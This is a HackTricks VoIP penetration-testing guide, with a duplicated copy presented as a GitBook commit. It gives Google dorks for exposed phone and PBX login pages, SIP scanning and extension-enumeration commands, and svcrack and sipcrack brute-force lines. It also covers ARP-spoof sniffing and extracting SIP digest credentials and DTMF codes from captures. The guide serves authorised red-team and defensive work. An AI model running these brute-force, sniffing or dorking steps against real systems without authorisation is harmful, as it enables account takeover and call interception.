hacktricks/network-services-pentesting/pentesting-voip/README.md

# Pentesting VoIP

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## VoIP Basic Information

To start learning about how VoIP works check:

{% content-ref url="basic-voip-protocols/" %}
[basic-voip-protocols](basic-voip-protocols/)
{% endcontent-ref %}

## VoIP Red Team Methodology

## VoIP Enumeration

### Telephone Numbers

One of the first steps a Red Team could do is to search available phone numbers to contact with the company using OSINT tools, Google Searches or scraping the web pages.

Once you have the telephone numbers you could use online services to identify the operator:

* [https://www.numberingplans.com/?page=analysis\&sub=phonenr](https://www.numberingplans.com/?page=analysis\&sub=phonenr)
* [https://mobilenumbertracker.com/](https://mobilenumbertracker.com/)
* [https://www.whitepages.com/](https://www.whitepages.com/)
* [https://www.twilio.com/lookup](https://www.twilio.com/lookup)

Knowing if the operator provides VoIP services you could identify if the company is using VoIP... Moreover, it's possible that the company hasn't hired VoIP services but is using PSTN cards to connect it's own VoIP PBX to the traditional telephony network.

Things such as automated responses of music usually indicates that VoIP is being used.

### Google Dorks

```bash
# Grandstream phones
intitle:"Grandstream Device Configuration" Password
intitle:"Grandstream Device Configuration" (intext:password & intext:"Grandstream Device Configuration" & intext:"Grandstream Networks" | inurl:cgi-bin) -.com|org

# Cisco Callmanager
inurl:"ccmuser/logon.asp"
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button"

# Cisco phones
inurl:"NetworkConfiguration" cisco

# Linksys phones
intitle:"Sipura SPA Configuration"

# Snom phones
intitle:"snom" intext:"Welcome to Your Phone!" inurl:line_login.htm

# Polycom SoundPoint IP & phones
intitle:"SoundPoint IP Configuration Utility - Registration"
"Welcome to Polycom Web Configuration Utility" "Login as" "Password"
intext: "Welcome to Polycom Web Configuration Utility" intitle:"Polycom - Configuration Utility" inurl:"coreConf.htm"
intitle:"Polycom Login" inurl:"/login.html"
intitle:"Polycom Login" -.com

# Elastix
intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"

# FreePBX
inurl:"maint/index.php?FreePBX" intitle: "FreePBX" intext:"FreePBX Admministration"
```

### OSINT information

Any other OSINT enumeration that helps to identify VoIP software being used will be helpful for a Red Team.

### Network Enumeration

* **`nmap`** is capable of scanning UDP services, but because of the number of UDP services being scanned, it's very slow and might not ve very accurante with this kind of services.
* **`svmap`** from SIPVicious (`sudo apt install sipvicious`): Will locate SIP services in the indicated network.
  * `svmap` is **easy to block** because it uses the User-Agent `friendly-scanner`, but you could modify the code from `/usr/share/sipvicious/sipvicious` and change it.

```bash
# Use --fp to fingerprint the services
svmap 192.168.1.0/24 -p 5060-5070 [--fp]
```

* **`sipscan.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipscan is a very fast scanner for SIP services over UDP, TCP or TLS. It uses multithread and can scan large ranges of networks. It allows to easily indicate a port range, scan both TCP & UDP, use another method (by default it will use OPTIONS) and specify a different User-Agent (and more).

```bash
 ./sipscan.py -i 192.168.2.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]

[!] IP/Network: 192.168.2.0/24
[!] Port range: 5060-5080
[!] Protocol: UDP, TCP, TLS
[!] Method to scan: REGISTER
[!] Customized User-Agent: Cisco
[!] Used threads: 200

```

* **metasploit**:

```
auxiliary/scanner/sip/options_tcp normal  No     SIP Endpoint Scanner (TCP)
auxiliary/scanner/sip/options     normal  No     SIP Endpoint Scanner (UDP)
```

#### Extra Network Enumeration

The PBX could also be exposing other network services such as:

* **69/UDP (TFTP)**: Firmware updates
* **80 (HTTP) / 443 (HTTPS)**: To manage the device from the web
* **389 (LDAP)**: Alternative to store the users information
* **3306 (MySQL**): MySQL database
* **5038 (Manager)**: Allows to use Asterisk from other platforms
* **5222 (XMPP)**: Messages using Jabber
* **5432 (PostgreSQL)**: PostgreSQL database
* And others...

### Extension Enumeration

Extensions in a PBX (Private Branch Exchange) system refer to the **unique internal identifiers assigned to individual** phone lines, devices, or users within an organization or business. Extensions make it possible to **route calls within the organization efficiently**, without the need for individual external phone numbers for each user or device.

* **`svwar`** from SIPVicious (`sudo apt install sipvicious`): `svwar` is a free SIP PBX extension line scanner. In concept it works similar to traditional wardialers by **guessing a range of extensions or a given list of extensions**.

```bash
svwar 192.168.1.15 -p5060 -e100-300 -m REGISTER
```

* **`sipextend.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipexten identifies extensions on a SIP server. Sipexten can check large network and port ranges.

```bash
python3 sipexten.py -i 192.168.2.203 -r 5080 -e 100-200
```

* **metasploit**: You can also enumerate extensions/usernames with metasploit:

```
auxiliary/scanner/sip/enumerator_tcp  normal  No     SIP Username Enumerator (TCP)
auxiliary/scanner/sip/enumerator      normal  No     SIP Username Enumerator (UDP)
```

* **`enumiax` (`apt install enumiax`): enumIAX** is an Inter Asterisk Exchange protocol **username brute-force enumerator**. enumIAX may operate in two distinct modes; Sequential Username Guessing or Dictionary Attack.

```bash
enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.1 # Use dictionary 
enumiax -v -m3 -M3 192.168.1.1
```

## VoIP Attacks

### Password Brute-Force

Having discovered the **PBX** and some **extensions/usernames**, a Red Team could try to **authenticate via the `REGISTER` method** to an extension using a dictionary of common passwords to brute force the authentication.

{% hint style="danger" %}
Note that a **username** can be the same as the extension, but this practice may vary depending on the PBX system, its configuration, and the organization's preferences...

If the username is not the same as the extension, you will need to **figure out the username to brute-force it**.
{% endhint %}

* **`svcrack`** from SIPVicious (`sudo apt install sipvicious`): SVCrack allows you to crack the password for a specific username/extension on a PBX.

```bash
svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username
svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions
```

* **`sipcrack.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIP Digest Crack is a tool to crack the digest authentications within the SIP protocol.

{% code overflow="wrap" %}
```bash
python3 siprcrack.py -i 192.168.2.203 -r 5080 -e 100,101,103-105 -w wordlist/rockyou.txt
```
{% endcode %}

* **Metasploit**:
  * [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb)
  * [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb)

### VoIP Sniffing

If you find VoIP equipment inside an **Open Wifi network**, you could **sniff all the information**. Moreover, if you are inside a more closed network (connected via Ethernet or protected Wifi) you could perform **MitM attacks such as** [**ARPspoofing**](../../generic-methodologies-and-resources/pentesting-network/#arp-spoofing) between the **PBX and the gateway** in order to sniff the information.

Among the network information, you could find **web credentials** to manage the equipment, user **extensions**, **username**, **IP** addresses, even **hashed passwords** and **RTP packets** that you could reproduce to **hear the conversation**, and more.

{% hint style="danger" %}
Note that if **TLS is used in the SIP communication** you won't be able to see the SIP communication in clear.\
The same will happen if **SRTP** and **ZRTP** is used, **RTP packets won't be in clear text**.
{% endhint %}

#### SIP credentials

[Check this example to understand better a **SIP REGISTER communication**](basic-voip-protocols/sip-session-initiation-protocol.md#sip-register-example) to learn how are **credentials being sent**.

* **`sipdump`** & **`sipcrack`,** part of **sipcrack** (`apt-get install sipcrack`): These tools can **extract** from a **pcap** the **digest authentications** within the SIP protocol and **bruteforce** them.

```bash
sipdump -p net-capture.pcap sip-creds.txt
sipcrack sip-creds.txt -w dict.txt
```

* **`siptshar.py`, `sipdump.py`, `sipcrack.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:**
  * **SipTshark** extracts data of SIP protocol from a PCAP file.
  * **SipDump** Extracts SIP Digest authentications from a PCAP file.
  * **SIP Digest Crack** is a tool to crack the digest authentications within the SIP protocol.

```bash
python3 siptshark.py -f captura3.pcap [-filter auth]
python3 sipdump.py -f captura3.pcap -o data.txt
python3 sipcrack.py -f data.txt -w wordlist/rockyou.txt
```

#### DTMF codes

**Not only SIP credentials** can be found in the network traffic, it's also possible to find DTMF codes which are used for example to access the **voicemail**.\
It's possible to send these codes in **INFO SIP messages**, in **audio** or inside **RTP packets**. If the codes are inside RTP packets, you could cut that part of the conversation and use the tool multimo to extract them:

```bash
multimon -a DTMF -t wac pin.wav
```

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>
GITBOOK-3875: change request with no subject merged in GitBook 2023-04-17 15:16:32 +00:00			`# Pentesting VoIP`

			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
			`* Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`

			`## VoIP Basic Information`

			`To start learning about how VoIP works check:`

			`{% content-ref url="basic-voip-protocols/" %}`
			`[basic-voip-protocols](basic-voip-protocols/)`
			`{% endcontent-ref %}`

			`## VoIP Red Team Methodology`

			`## VoIP Enumeration`

			`### Telephone Numbers`

			`One of the first steps a Red Team could do is to search available phone numbers to contact with the company using OSINT tools, Google Searches or scraping the web pages.`

			`Once you have the telephone numbers you could use online services to identify the operator:`

			`* [https://www.numberingplans.com/?page=analysis\&sub=phonenr](https://www.numberingplans.com/?page=analysis\&sub=phonenr)`
			`* [https://mobilenumbertracker.com/](https://mobilenumbertracker.com/)`
			`* [https://www.whitepages.com/](https://www.whitepages.com/)`
			`* [https://www.twilio.com/lookup](https://www.twilio.com/lookup)`

			`Knowing if the operator provides VoIP services you could identify if the company is using VoIP... Moreover, it's possible that the company hasn't hired VoIP services but is using PSTN cards to connect it's own VoIP PBX to the traditional telephony network.`

			`Things such as automated responses of music usually indicates that VoIP is being used.`

			`### Google Dorks`

			```bash
			`# Grandstream phones`
			`intitle:"Grandstream Device Configuration" Password`
			`intitle:"Grandstream Device Configuration" (intext:password & intext:"Grandstream Device Configuration" & intext:"Grandstream Networks" \| inurl:cgi-bin) -.com\|org`

			`# Cisco Callmanager`
			`inurl:"ccmuser/logon.asp"`
			`intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button"`

			`# Cisco phones`
			`inurl:"NetworkConfiguration" cisco`

			`# Linksys phones`
			`intitle:"Sipura SPA Configuration"`

			`# Snom phones`
			`intitle:"snom" intext:"Welcome to Your Phone!" inurl:line_login.htm`

			`# Polycom SoundPoint IP & phones`
			`intitle:"SoundPoint IP Configuration Utility - Registration"`
			`"Welcome to Polycom Web Configuration Utility" "Login as" "Password"`
			`intext: "Welcome to Polycom Web Configuration Utility" intitle:"Polycom - Configuration Utility" inurl:"coreConf.htm"`
			`intitle:"Polycom Login" inurl:"/login.html"`
			`intitle:"Polycom Login" -.com`

			`# Elastix`
			`intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"`

			`# FreePBX`
			`inurl:"maint/index.php?FreePBX" intitle: "FreePBX" intext:"FreePBX Admministration"`
			```

			`### OSINT information`

			`Any other OSINT enumeration that helps to identify VoIP software being used will be helpful for a Red Team.`

			`### Network Enumeration`

			* `nmap` is capable of scanning UDP services, but because of the number of UDP services being scanned, it's very slow and might not ve very accurante with this kind of services.
			* `svmap` from SIPVicious (`sudo apt install sipvicious`): Will locate SIP services in the indicated network.
			* `svmap` is easy to block because it uses the User-Agent `friendly-scanner`, but you could modify the code from `/usr/share/sipvicious/sipvicious` and change it.

			```bash
			`# Use --fp to fingerprint the services`
			`svmap 192.168.1.0/24 -p 5060-5070 [--fp]`
			```

			* `sipscan.py` from [sippts](https://github.com/Pepelux/sippts): Sipscan is a very fast scanner for SIP services over UDP, TCP or TLS. It uses multithread and can scan large ranges of networks. It allows to easily indicate a port range, scan both TCP & UDP, use another method (by default it will use OPTIONS) and specify a different User-Agent (and more).

			```bash
			`./sipscan.py -i 192.168.2.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]`

			`[!] IP/Network: 192.168.2.0/24`
			`[!] Port range: 5060-5080`
			`[!] Protocol: UDP, TCP, TLS`
			`[!] Method to scan: REGISTER`
			`[!] Customized User-Agent: Cisco`
			`[!] Used threads: 200`

			```

			`* metasploit:`

			```
			`auxiliary/scanner/sip/options_tcp normal No SIP Endpoint Scanner (TCP)`
			`auxiliary/scanner/sip/options normal No SIP Endpoint Scanner (UDP)`
			```

			`#### Extra Network Enumeration`

			`The PBX could also be exposing other network services such as:`

			`* 69/UDP (TFTP): Firmware updates`
			`* 80 (HTTP) / 443 (HTTPS): To manage the device from the web`
			`* 389 (LDAP): Alternative to store the users information`
			`* 3306 (MySQL): MySQL database`
			`* 5038 (Manager): Allows to use Asterisk from other platforms`
			`* 5222 (XMPP): Messages using Jabber`
			`* 5432 (PostgreSQL): PostgreSQL database`
			`* And others...`

			`### Extension Enumeration`

			`Extensions in a PBX (Private Branch Exchange) system refer to the unique internal identifiers assigned to individual phone lines, devices, or users within an organization or business. Extensions make it possible to route calls within the organization efficiently, without the need for individual external phone numbers for each user or device.`

			* `svwar` from SIPVicious (`sudo apt install sipvicious`): `svwar` is a free SIP PBX extension line scanner. In concept it works similar to traditional wardialers by guessing a range of extensions or a given list of extensions.

			```bash
			`svwar 192.168.1.15 -p5060 -e100-300 -m REGISTER`
			```

			* `sipextend.py` from [sippts](https://github.com/Pepelux/sippts): Sipexten identifies extensions on a SIP server. Sipexten can check large network and port ranges.

			```bash
			`python3 sipexten.py -i 192.168.2.203 -r 5080 -e 100-200`
			```

			`* metasploit: You can also enumerate extensions/usernames with metasploit:`

			```
			`auxiliary/scanner/sip/enumerator_tcp normal No SIP Username Enumerator (TCP)`
			`auxiliary/scanner/sip/enumerator normal No SIP Username Enumerator (UDP)`
			```

			* `enumiax` (`apt install enumiax`): enumIAX is an Inter Asterisk Exchange protocol username brute-force enumerator. enumIAX may operate in two distinct modes; Sequential Username Guessing or Dictionary Attack.

			```bash
			`enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.1 # Use dictionary`
			`enumiax -v -m3 -M3 192.168.1.1`
			```

			`## VoIP Attacks`

			`### Password Brute-Force`

			Having discovered the PBX and some extensions/usernames, a Red Team could try to authenticate via the `REGISTER` method to an extension using a dictionary of common passwords to brute force the authentication.

			`{% hint style="danger" %}`
			`Note that a username can be the same as the extension, but this practice may vary depending on the PBX system, its configuration, and the organization's preferences...`

			`If the username is not the same as the extension, you will need to figure out the username to brute-force it.`
			`{% endhint %}`

			* `svcrack` from SIPVicious (`sudo apt install sipvicious`): SVCrack allows you to crack the password for a specific username/extension on a PBX.

			```bash
			`svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username`
			`svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions`
			```

			* `sipcrack.py` from [sippts](https://github.com/Pepelux/sippts): SIP Digest Crack is a tool to crack the digest authentications within the SIP protocol.

			`{% code overflow="wrap" %}`
			```bash
			`python3 siprcrack.py -i 192.168.2.203 -r 5080 -e 100,101,103-105 -w wordlist/rockyou.txt`
			```
			`{% endcode %}`

			`* Metasploit:`
			`* [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb)`
			`* [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb)`

			`### VoIP Sniffing`

			`If you find VoIP equipment inside an Open Wifi network, you could sniff all the information. Moreover, if you are inside a more closed network (connected via Ethernet or protected Wifi) you could perform MitM attacks such as [ARPspoofing](../../generic-methodologies-and-resources/pentesting-network/#arp-spoofing) between the PBX and the gateway in order to sniff the information.`

			`Among the network information, you could find web credentials to manage the equipment, user extensions, username, IP addresses, even hashed passwords and RTP packets that you could reproduce to hear the conversation, and more.`

			`{% hint style="danger" %}`
			`Note that if TLS is used in the SIP communication you won't be able to see the SIP communication in clear.\`
			`The same will happen if SRTP and ZRTP is used, RTP packets won't be in clear text.`
			`{% endhint %}`

			`#### SIP credentials`

			`[Check this example to understand better a SIP REGISTER communication](basic-voip-protocols/sip-session-initiation-protocol.md#sip-register-example) to learn how are credentials being sent.`

			* `sipdump` & `sipcrack`, part of sipcrack (`apt-get install sipcrack`): These tools can extract from a pcap the digest authentications within the SIP protocol and bruteforce them.

			```bash
			`sipdump -p net-capture.pcap sip-creds.txt`
			`sipcrack sip-creds.txt -w dict.txt`
			```

			* `siptshar.py`, `sipdump.py`, `sipcrack.py` from [sippts](https://github.com/Pepelux/sippts):
			`* SipTshark extracts data of SIP protocol from a PCAP file.`
			`* SipDump Extracts SIP Digest authentications from a PCAP file.`
			`* SIP Digest Crack is a tool to crack the digest authentications within the SIP protocol.`

			```bash
			`python3 siptshark.py -f captura3.pcap [-filter auth]`
			`python3 sipdump.py -f captura3.pcap -o data.txt`
			`python3 sipcrack.py -f data.txt -w wordlist/rockyou.txt`
			```

			`#### DTMF codes`

			`Not only SIP credentials can be found in the network traffic, it's also possible to find DTMF codes which are used for example to access the voicemail.\`
			`It's possible to send these codes in INFO SIP messages, in audio or inside RTP packets. If the codes are inside RTP packets, you could cut that part of the conversation and use the tool multimo to extract them:`

			```bash
			`multimon -a DTMF -t wac pin.wav`
			```

			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
			`* Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`